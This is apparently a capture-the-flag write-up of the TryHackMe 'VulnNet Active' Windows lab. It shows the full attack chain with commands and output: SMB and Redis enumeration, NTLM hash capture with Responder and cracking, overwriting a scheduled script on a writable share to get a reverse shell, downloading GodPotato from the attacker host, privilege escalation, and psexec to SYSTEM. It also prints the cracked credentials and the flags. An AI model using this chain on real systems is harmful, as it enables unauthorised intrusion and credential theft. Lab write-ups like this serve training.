> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-vulnnet-active.md).

# THM - Vulnnet Active

## Enumeration and Foothold

### NMAP

```bash
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
6379/tcp  open  redis         Redis key-value store 2.8.2402
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49780/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Windows Server 2019 (97%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-02-16T21:15:44
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   149.57 ms 192.168.128.1
2   ...
3   150.50 ms 10.81.155.119
```

### SMB

```bash
──(ajay㉿kali)-[~]
└─$ smbclient -L \\\\10.81.155.119\\
Password for [WORKGROUP\ajay]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.81.155.119 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.81.155.119 -u ' ' -p ' ' --shares                           
SMB         10.81.155.119   445    VULNNET-BC3TCK1  [*] Windows 10 / Server 2019 Build 17763 x64 (name:VULNNET-BC3TCK1) (domain:vulnnet.local) (signing:True) (SMBv1:False) 
SMB         10.81.155.119   445    VULNNET-BC3TCK1  [-] vulnnet.local\ :  STATUS_LOGON_FAILURE 
```

Can login as anonymous but can list the shares.

### Redis - 6379

```bash
┌──(ajay㉿kali)-[~]
└─$ redis-cli -h 10.81.155.119
10.81.155.119:6379> 
10.81.155.119:6379> 
10.81.155.119:6379> help
redis-cli 8.0.5
To get help about Redis commands type:
      "help @<group>" to get a list of commands in <group>
      "help <command>" for help on <command>
      "help <tab>" to get a list of possible help topics
      "quit" to exit

To set redis-cli preferences:
      ":set hints" enable online hints
      ":set nohints" disable online hints
Set your preferences in ~/.redisclirc
10.81.155.119:6379> INFO
# Server
redis_version:2.8.2402
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:b2a45a9622ff23b7
redis_mode:standalone
os:Windows  
arch_bits:64
multiplexing_api:winsock_IOCP
process_id:3768
run_id:b01f2533231fb457d39c2eb84ea6121859179880
tcp_port:6379
uptime_in_seconds:1188
uptime_in_days:0
hz:10
lru_clock:9669051
config_file:
# Keyspace
db0:keys=1,expires=0,avg_ttl=0
```

Redis Current working directory

```bash
10.81.155.119:6379> CONFIG GET dir
1) "dir"
2) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"
10.81.155.119:6379> 
```

Can write to the redis server.

```bash
1.155.119:6379> SET test123 hello
OK
10.81.155.119:6379> GET test123
"hello"
10.81.155.119:6379> 
```

Current User

```bash
"C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"

**enterprise-security**
```

#### Redis LLMNR

request to a fake share can be any random name.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FH7pMfJQfXooeU9PKjY41%2Fimage.png?alt=media&amp;token=42801e6b-6367-477a-8df9-25afd3825425" alt=""><figcaption></figcaption></figure>

```bash
┌──(ajay㉿kali)-[~]
└─$ sudo responder -I tun0 

[SMB] NTLMv2-SSP Username : VULNNET\enterprise-security
[SMB] NTLMv2-SSP Hash     : enterprise-security::VULNNET:1d91045d7c107c32:EE4C6C7386D98428049F1AFA4A3AD472:0101000000000000009CE74C669FDC0183595E637F1ADF1E0000000002000800590033004700390001001E00570049004E002D0041004200380042004100540039003600330058004B0004003400570049004E002D0041004200380042004100540039003600330058004B002E0059003300470039002E004C004F00430041004C000300140059003300470039002E004C004F00430041004C000500140059003300470039002E004C004F00430041004C0007000800009CE74C669FDC0106000400020000000800300030000000000000000000000000300000095497B37C995FBE386E47A49ABC94D5738CCBF54A73F6C52514A86B65021F2A0A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100370030002E003200310037000000000000000000 
```

```bash
┌──(ajay㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
**sand_0873959498**  (enterprise-security)     
1g 0:00:00:02 DONE (2026-02-16 17:07) 0.3802g/s 1526Kp/s 1526Kc/s 1526KC/s sandi&j4..sand36
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                                                                                            
```

```bash
─(ajay㉿kali)-[~]
└─$ nxc smb 10.81.139.16 -u enterprise-security -p sand_0873959498
SMB         10.81.139.16    445    VULNNET-BC3TCK1  [*] Windows 10 / Server 2019 Build 17763 x64 (name:VULNNET-BC3TCK1) (domain:vulnnet.local) (signing:True) (SMBv1:False) 
SMB         10.81.139.16    445    VULNNET-BC3TCK1  [+] vulnnet.local\enterprise-security:sand_0873959498 

┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.81.139.16 -u enterprise-security -p sand_0873959498 --shares
SMB         10.81.139.16    445    VULNNET-BC3TCK1  [*] Windows 10 / Server 2019 Build 17763 x64 (name:VULNNET-BC3TCK1) (domain:vulnnet.local) (signing:True) (SMBv1:False) 
SMB         10.81.139.16    445    VULNNET-BC3TCK1  [+] vulnnet.local\enterprise-security:sand_0873959498 
SMB         10.81.139.16    445    VULNNET-BC3TCK1  [*] Enumerated shares
SMB         10.81.139.16    445    VULNNET-BC3TCK1  Share           Permissions     Remark
SMB         10.81.139.16    445    VULNNET-BC3TCK1  -----           -----------     ------
SMB         10.81.139.16    445    VULNNET-BC3TCK1  ADMIN$                          Remote Admin
SMB         10.81.139.16    445    VULNNET-BC3TCK1  C$                              Default share
SMB         10.81.139.16    445    VULNNET-BC3TCK1  Enterprise-Share READ,WRITE      
SMB         10.81.139.16    445    VULNNET-BC3TCK1  IPC$            READ            Remote IPC
SMB         10.81.139.16    445    VULNNET-BC3TCK1  NETLOGON        READ            Logon server share 
SMB         10.81.139.16    445    VULNNET-BC3TCK1  SYSVOL          READ            Logon server share

```

```bash
─(ajay㉿kali)-[~]
└─$ smbclient //10.81.139.16/Enterprise-Share -U "enterprise-security%sand_0873959498"
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Feb 16 17:10:37 2026
  ..                                  D        0  Mon Feb 16 17:10:37 2026
  PurgeIrrelevantData_1826.ps1        A       69  Tue Feb 23 19:33:18 2021

                9558271 blocks of size 4096. 5010758 blocks available
smb: \> mget PurgeIrrelevantData_1826.ps1 
Get file PurgeIrrelevantData_1826.ps1? y
getting file \PurgeIrrelevantData_1826.ps1 of size 69 as PurgeIrrelevantData_1826.ps1 (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> 
```

```bash
─(ajay㉿kali)-[~]
└─$ cat PurgeIrrelevantData_1826.ps1
rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue
```

The script is deleting all the files in the Documents folder.

Since there is a script in the share and we also have write access we can edit the scirpt and see if any one is accessing the share continuosly but putting a reverse shell in the place of original script. this script if its a cronjob will executed automaitcally and give reverse shell or if any user is accessing it then we get a reverse shell.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQ13EgKJ3zZ4nFEk9FwCr%2Fimage.png?alt=media&amp;token=bd38d3d0-6dde-498b-a2e1-c788e5b226ff" alt=""><figcaption></figcaption></figure>

cannot delete the file so lets override it by uploading our reverse shell script.

```bash
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ smbclient //10.81.139.16/Enterprise-Share -U "enterprise-security%sand_0873959498"
Try "help" to get a list of possible commands.
smb: \> put PurgeIrrelevantData_1826.ps1
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (1.6 kB/s) (average 1.6 kB/s)
smb: \> 

```

```bash
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.170.217] from (UNKNOWN) [10.81.139.16] 49948
id
PS C:\Users\enterprise-security\Downloads> 

```

## Shell as Enterprise-Security

```bash
PS C:\Users\enterprise-security> cd Desktop
PS C:\Users\enterprise-security\Desktop> dir

    Directory: C:\Users\enterprise-security\Desktop

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        2/23/2021   8:24 PM             37 user.txt                                                              

PS C:\Users\enterprise-security\Desktop> cat user.txt
THM{3eb176aee96432d5b100bc93580b291e}
PS C:\Users\enterprise-security\Desktop>
```

```bash
PS C:\Users\enterprise-security\Downloads> whoami /all

USER INFORMATION
----------------

User Name                   SID                                         
=========================== ============================================
vulnnet\enterprise-security S-1-5-21-1405206085-1650434706-76331420-1103

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes                                        
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                   

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

```

### SeImpersonate Privilege

Because OS is **Windows Server 2019 (Build 17763)**, older "Potatoes" like RottenPotato or JuicyPotato won't work because Microsoft patched the way those tools exploit the DCOM/RPC interaction.

The Correct Potato: GodPotato or PrintSpoofer

Checking if Spooler is running or not.

```bash
PS C:\Users\enterprise-security\Downloads> Get-Service -Name Spooler                    

Status   Name               DisplayName                           
------   ----               -----------                           
Running  Spooler            Print Spooler                    
```

Checking the OS version for God potato.

```bash
PS C:\Users\enterprise-security\Downloads> [Environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      17763  0       
```

So both the God Potato and the Print Spooler work here.

### Godpotato

```bash
PS C:\Users\enterprise-security\Downloads> curl <http://192.168.170.217:8000/GodPotato-NET4.exe> -outfile GodPotato-NET4.exe
PS C:\Users\enterprise-security\Downloads> dir

    Directory: C:\Users\enterprise-security\Downloads

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/23/2021   2:29 PM                nssm-2.24-101-g897c7ad                                                
d-----        2/26/2021  12:14 PM                Redis-x64-2.8.2402                                                    
-a----        2/16/2026   2:47 PM          57344 GodPotato-NET4.exe                                                    
-a----        2/26/2021  10:37 AM            143 startup.bat  
```

```bash
PS C:\Users\enterprise-security\Downloads> .\GodPotato-NET4.exe -cmd "net localgroup Administrators enterprise-security /add"
[*] CombaseModule: 0x140716946948096
[*] DispatchTable: 0x140716949265584
[*] UseProtseqFunction: 0x140716948644480
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\386d1fcb-b29e-4c39-b593-c7175ac958c8\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00001802-08c8-ffff-eaf3-fab8aa13015a
[*] DCOM obj OXID: 0xa82fafc48e73a4c3
[*] DCOM obj OID: 0x48468d1954008bd8
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 880 Token:0x804  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 972
The command completed successfully.

```

```bash
Users\enterprise-security\Downloads> net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
enterprise-security
The command completed successfully.

```

Tried to evil-winrm but the connection didnt happen.

so used the god potato read it.

```bash
PS C:\Users\enterprise-security\Downloads> .\GodPotato-NET4.exe -cmd "cmd /c type C:\Users\Administrator\Desktop\system.txt"
[*] CombaseModule: 0x140716946948096
[*] DispatchTable: 0x140716949265584
[*] UseProtseqFunction: 0x140716948644480
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\ce6ef24a-8882-4389-a397-fee9a5c23e19\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000c402-0c58-ffff-1d70-f41fc5bf3fc0
[*] DCOM obj OXID: 0xc28c071a3bab1aaa
[*] DCOM obj OID: 0x28be2adb27ba01a2
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 880 Token:0x804  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3140
THM{d540c0645975900e5bb9167aa431fc9b}
PS C:\Users\enterprise-security\Downloads> 
```

## Shell as Admin

```bash
──(ajay㉿kali)-[~]
└─$ impacket-psexec vulnnet.local/enterprise-security:'sand_0873959498'@10.81.139.16                                     
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.81.139.16.....
[*] Found writable share ADMIN$
[*] Uploading file JSRcgjen.exe
[*] Opening SVCManager on 10.81.139.16.....
[*] Creating service lXQW on 10.81.139.16.....
[*] Starting service lXQW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1757]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> 
```

```bash
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is AAC5-C2C2

 Directory of C:\Users\Administrator\Desktop

02/23/2021  08:27 PM    <DIR>          .
02/23/2021  08:27 PM    <DIR>          ..
02/23/2021  08:27 PM                37 system.txt
               1 File(s)             37 bytes
               2 Dir(s)  20,284,280,832 bytes free

```

```bash
C:\Users\Administrator\Desktop> more system.txt
THM{d540c0645975900e5bb9167aa431fc9b}
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-vulnnet-active.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
